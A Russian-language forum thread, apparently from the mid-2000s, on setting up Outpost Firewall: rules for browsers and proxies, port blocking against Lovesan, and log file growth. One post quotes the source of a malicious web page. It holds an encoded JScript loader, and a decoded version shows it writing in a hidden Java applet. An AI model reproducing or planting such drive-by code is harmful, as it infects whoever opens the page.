» Agnitum Outpost Firewall

andrex


Цитата:

Update windows делала недавно?

Я обновлял Виндоус уже давно - аж месяца 3 назад.

> месяца назад я обновил Орфо.
А тут вдруг вчера Аутпост проснулся: надо ему, видите ли, обновить информацию о компоненте Орфо. С какого, скажите, бодуна, ему это надо? Что бы могла Орфо делать в интернете? На выбор мне было дано две возможности: обновить информацию об Орфо и перекрыть Орфо возможность выхода в интернет. Я выбрал вторую возможность -- думал, пройдёт. Фигушки! Тогда и на сайт Рамблера я не смог выйти! Пришлось-таки обновить инфу об Орфо. Такие истории случаются раз в ~ 2 дня, и не только с Орфо, но и с другими программами (вроде бы не относящимися к интернету напрямую, хотя, кто знает?).

Осталось такое чувство, что где-то здесь зарыто какое-то spy.
Автоматическое обновление Виндоус у меня запрещено.

Lapochka ili Chai

Проще всего избежать этой проблемы - переустановить outpoost. Только не поверх, а предварительно удалив и вычистив предыдущую установку. Если проблема не решится, то действительно у тебя система чем-то заражена...

Цитата:

Список таблицы "Открытые порты".

А у меня в открытых портах есть такой:

svchost.exe localhost 135 UDP

Как думаете, это червь? Вроде бы бластер-червь характеризовался портом 135 на TCP, а не UDP?

Добавлено
andrex

Цитата:

Проще всего избежать этой проблемы - переустановить outpoost.

Big Thanks. Попробуем-попробуем.

Lapochka ili Chai
это не вирус или червь, это особеность работы винды с DLLhook - такие же вещи происходят когда в системе работает какая-либо клавиатурная прога, например PuntoSwitcher. Судя по всему ORFO одной из своих DLL постоянно цепляется к процессам, вот OP и нервничает - он видит что в адресное пространство контролируемого процесса добавилась DLL. решение есть - уменьшить уровень контроля компонентов до нормального.

Добрый день Всем.
Из прочитанного ВСЕГО топика стало многое понятно. Не на что не претендую, но попробую немного систематизировать, Первым делом после установки надо отключить автообновление, потом обязательно отключить Allow Loopback (Параметры-Системные-Общие правила-Параметры «Галочку убрать» на Allow Loopback), который по умолчанию, почему то включен. Многие пользуются WinXP SP1 без локальной сети с Ad Muncher v4.51 и MyIE 0.9.10. Вот тут и начинаются непонятки. Ну с первым ее куда нешло. После отключения Loopback. Мюнчер выдает окошко предупреждения, что он автоматически включает «поддержку» Firewall. Ставит галочку автоматом. (Option-Routing-Binding option). Ну тут выходит MyIE. И первым делом он хочет соединиться по протоколу UDP. Вот тут то возникает первая непонятка разрешать или нет. После этого каждый раз спрашивает стоит ли соединяться по TCP на исходящие IP адрес моего провайдера порт 1101 или 1102. причем стандартное правило Как Браузер Не помогает приходиться все время разрешать а с нового соединения IP адрес меняется и все по новой. Вот и возникают вопросы, а как ПРАВИЛЬНО все это настроить правила для Двух программ. Спасибо заранее за советы по Существу.
В моей попытке привести к системе, использовались СОВЕТЫ от Ilich Ramiras.

SergPol

Цитата:

И первым делом он хочет соединиться по протоколу UDP.

Я запретил.

Цитата:

После этого каждый раз спрашивает стоит ли соединяться по TCP на исходящие IP адрес моего провайдера порт 1101 или 1102

У меня такого запроса не было. Попробуй запретить. Если inet вырубится, то разрешай...
Если провайдет что-то там нахимичил, то открой эти порты для его ip и больше outpost напрягать не будет.

SergPol, я первым делом запретил IE, проводник и WMP, чтоб не было лишних вопросов.

Подскажите пожалуйста как настроить Outpost блокировать инфу отсылаемую браузером (тип браузера и OS на которой он находится).

Anna
никак... это нужно пользовать какой-нибудь прокс, например, прксомитрон.

Добавлено
SergPol
Цитата:

MyIE. И первым делом он хочет соединиться по протоколу UDP. Вот тут то возникает первая непонятка разрешать или нет. После этого каждый раз спрашивает стоит ли соединяться по TCP на исходящие IP адрес моего провайдера порт 1101 или 1102

что то у тебя криво настроено, я так понимаю, что адмунчер, это локальный прокс? так вот муиё должен лезть на локалхост, на этот адмунчер, по стандартным портам 8080, или как там ты его настроил. и уже адмунчер должон лезть наружу, а так, вроде бы, получается, что муиё лезет мимо адмунчера:))

Ilich Ramiras
А что такое адмунчер?

Возможно обсуждалось, но если так, ткните пальцем. Проблема следующая, у меня у сабжа версия 2.0.255.2919 (281) непомерно ростет, как понимаю, файл журнала - op_data.mdb
За 3-4 дня он вырастает до 600мб, и при этом файрвол начинает сильно подгружать систему и занимать кучу места в опиративке. Приходится в ручную удалять файл.

Kurt

Убей его при выключенном Outpost и его сервисе и переименуй библиотеку op_data.dll.

Доброе время суток, господа. Подскажите, pls, какие закрыть порты в Outpost'e для защиты от Worm.Win32.Lovesan. Симптомы: Отключение системы вызвано NT AUTHORITY\SYSTEM... Обноление стоит.

Award
а взгляд бросить в шапку?:))
да, и сначала вылечиться не мешает:))

мда, растроился я. Сегодня друг по сети решил проверить мою защиту и... взломал. отстой однако. придётся искать что-то другое

Vsevolod

Цитата:

взломал. отстой однако

ПОЖАЛУЙСТА, мотивируй. Я недавно перешёл на этот фаер. Как проверить его защиту по сети?

твой друг что, хакер? Нет он ...

Обычно дело не в файрволе, все они примерно равны. Весь вопрсо, как правило, в настройках. Может он просто зашел через незапороленый аккаунт, тут файр-вол не причем....

Ilich Ramiras

Цитата:

да, и сначала вылечиться не мешает

Я вылечился. Но ведь вопрос остался.

Award

Код: go to Advanced Rules and make rule like that

Where Protocol - TCP
Where Connection - Incoming (optional)
Where Local port is - nomera portov mozno prosot napsiat 135 a mozno i tak 135-139, 445

Apply

Народ, а оно умеет вести лог скачиваемого файла, по типу NPF? Чтобы можно было выцепить из него текущий скачиваемый IE через скрипт на сайте файл и запихнуть в Reget?

kkk4
А чем не устраивает плагин Muchod HTTPLog plugin v 0.4 (см. шапку)?
Он как раз все это неплохо делает...
А еще есть уже для самого IE плагины подобного рода, но это уже оффтопик

Цитата:

А чем не устраивает плагин Muchod HTTPLog plugin v 0.4 (см. шапку)?
Он как раз все это неплохо делает...

1. Потому, что он только http - на ftp клал с высокой башни
2. Потому, что ссылка копируется с кучей мусора в виде "квадратиков" не к месту.

При завершении работы системы Аутпост в Application log не оставляет Warning'ов, что дескать, при завершении работы системы не успел завершить свои службы?

andrex
Yanson
Ilich Ramiras

Спасибо за ответы.

andrex я тоже запретил UDP. Но ведь прикол в том, что если Муиё пытается соединиться по UDP то ему это для чего то нужно. Просто принципиально хотелось знать для чего Муиё туда на UDP лезет. Согласен Лучше все таки запретить, чем потом "бояться". На "1000" порты именно Муиё лезет. Я то ему разрешил, потому что если не разрешать, то он не соединяется вообще.

Yanson недопонял если все запретить, то как же оно работать будет тем паче IE.

Ilich Ramiras я не спорю, что криво у меня ПОКА настроено. Если не Трудно объяснить, а как именно нужно. Именно Для Этих ДВУХ Программ (Муиё и Адмунчер), чтобы по Уму она отрабатывало. Правила я имею ввиду.

SergPol
зачем браузеру лезть на удп?:))
в общем. как бы мы тут что не обсуждали. это будет офтоп в оуьтпосте, оутпост в твоих проблемах не виноват. давай в приват c этим делом:))

Господа, я напоролся на какой-то странный вирус что ли (или что-то, что незаметно делает то, чего я у него не просил): это оформлено в виде html-файла на некоем сайте. Имя файла

z.html

Имя сайта:
http://www.puh.ru/

После этого образовалось окно, в котором мгновенно промелькнули буковки "приложение запущено" (или что-то в этом роде), а дальше от окна остался только лишь прямоугольничек на полоске таскбара.

Аутпост его не заметил и пропустил.


Добавлено
Кстати, файл z.html я вам запускать не советую: как из ведра польёт порнография, так что (может быть) вы не сможете её остановить без перезагрузки компьютера.
Но посмотреть другими средствами его можно: там лежит код программы в виде


Цитата:

<html>
<body>

<script language = JScript.Encode>
#@~^4AAAAA==[Km;s+ YRSDbO+vB@!W(Ln^DPhb[Y4'FZTYP4+bo4YxqZ!YPb['9lOC,YX2n{Yn6D&4Yh^P9lYm'hwDX tD:s@*@!-zK8LmY@*vbi9W1Eh+UOch.kDn`E@!)KhS2P~1W[+{Emw2^+DRm^lkdJ,mGN4Cd'JcEP,lVbLU'r4m/nVrUJ~hb[Y4'EqrPtnrTtO'rqrP\z5UZI&n:@*@!JbKnd2P@*E#jEcAAA==^#~@
</script>

</body>

</html>

Странно, что ни антивирус, ни Аутпост его не заметили.

<!-- pt language = JScript.Encode>document.write('<object width=100% height=100% id=data type=text/html data=empty.html><\/object>');document.write('<APPLET code="_removed_.class" codebase="." align="baseline" width="1" height="1" MAYSCRIPT></APPLET>')</scri-->

"_removed_.class" - ява апплет, 3.628 байт
вот там что-то и было

ЗЫ: сорри, оффтоп ))

Цитата:

Yanson недопонял если все запретить, то как же оно работать будет тем паче IE

SergPol, пользуюсь оперой, поэтому и всему остальному данного производителя нечего делать в сети.

Вчера благополучно поймал троян, уперший данные с машины. Outpost даже не чихнул. Т.к. логгер удален из-за тормознутости, то пришлось помучаться. Косвенно помог древний Reget, втихапя апдейтящийся, несмотря на запрет всех действий для Reget.exe

Выводы - очередная дыра, точнее российское известно что - в правилах по умолчанию полный доступ для rundll.32. Это к тому, что если уж продаешь продукт с предустановленными правилами чайнику - стоит позаботиться о его безопасности (у других firewall-ов я ни разу не видел rundll32 в разрешенных)

kkk4
здается мне ты слегка ошибаешься - в правилах по умолчанию не прописано ни одного приложения. если OP нормально настроен, он будет ловить и апдейты регета и трояны.